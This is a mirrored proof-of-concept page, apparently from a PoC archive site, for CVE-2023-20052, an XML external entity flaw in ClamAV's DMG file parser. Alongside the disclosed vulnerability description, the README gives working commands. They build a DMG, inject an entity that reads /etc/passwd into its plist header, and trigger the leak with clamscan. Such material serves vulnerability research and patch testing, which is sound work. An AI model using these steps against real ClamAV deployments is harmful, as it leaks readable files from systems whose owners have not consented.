Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-20052 PoC — ClamAV 安全漏洞

Source
https://github.com/nokn0wthing/CVE-2023-20052
Associated Vulnerability
Title:ClamAV 安全漏洞 (CVE-2023-20052)
Description:On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed: A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device. This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.
Description
CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV
Readme
# CVE-2023-20052
CVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV

Usage  
To create malicious DMG file
```
git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg
```
![](https://raw.githubusercontent.com/nokn0wthing/CVE-2023-25002/main/1.png)

To trigger exploit  
`clamscan --debug exploit.dmg `  

![](https://raw.githubusercontent.com/nokn0wthing/CVE-2023-25002/main/2.png)
File Snapshot

 [4.0K]  /data/pocs/44da006490a122d9db42a85b116cb5bef05a576a
├── [ 24K]  1.png
├── [ 22K]  2.png
├── [ 556]  Dockerfile
└── [ 859]  README.md

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →